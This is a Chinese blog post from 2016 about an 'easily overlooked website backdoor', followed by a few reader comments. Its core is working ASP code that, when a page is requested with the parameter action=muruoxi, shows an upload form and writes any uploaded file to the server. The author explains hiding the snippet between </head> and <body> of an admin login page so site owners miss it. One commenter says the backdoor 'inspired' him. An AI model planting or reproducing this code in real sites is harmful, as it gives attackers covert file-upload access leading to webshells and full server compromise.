当前位置:首页 > 宅科技 > 正文

容易被忽视的网站后门

<%if request.QueryString("action")="muruoxi" then 
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form> 
<%end if%>

呐,上述代码插入某页面,比如你的后台登录页,加到</head>和<body>中,一般站长检查就会忽略,然而当攻击者访问你的后台登录页,如login.asp时加上参数action=muruoxi,构成语句login.asp?action=muruoxi,直接就能拥有上传木马的权限了……


 

欢迎加入电脑问题互助交流,群聊号码:865856349

文章标题:容易被忽视的网站后门
本文作者:慕若曦
发表日期:2016-04-19 11:49 星期二    首发于    暮若夕
本文固定链接: https://www.muruoxi.com/252.html
 
文章标签:
上一篇: 下一篇:

18 条评论

评论加载中...
  1. 13楼
    西北   

    突然发现这个后门给了我启发

    2016年9月4日 下午1:10 评论
  2. 12楼
    李明   

    很可怕的网站后门。

    2016年5月26日 上午12:41 评论
  3. 11楼
    vultr   

    兄弟,交换链接吗?

    2016年5月12日 下午12:24 评论
    • 长安   

      兄弟,佩服你说真话的勇气

      2016年5月12日 下午12:33 评论
      • vultr   

        嘛意思? 我说假话了?

        2016年5月12日 下午2:18 评论

发表评论

╮( ̄▽ ̄)╭ |  (= ̄ω ̄=) |  (>﹏<) |  Σ( ° △ °|||)︴ |  Σ(っ °Д °;)っ |  X﹏X |  (╯-_-)╯╧╧

小提示:提交评论后刷新本页面即可看到隐藏的文件哦~
十年之约
加载中……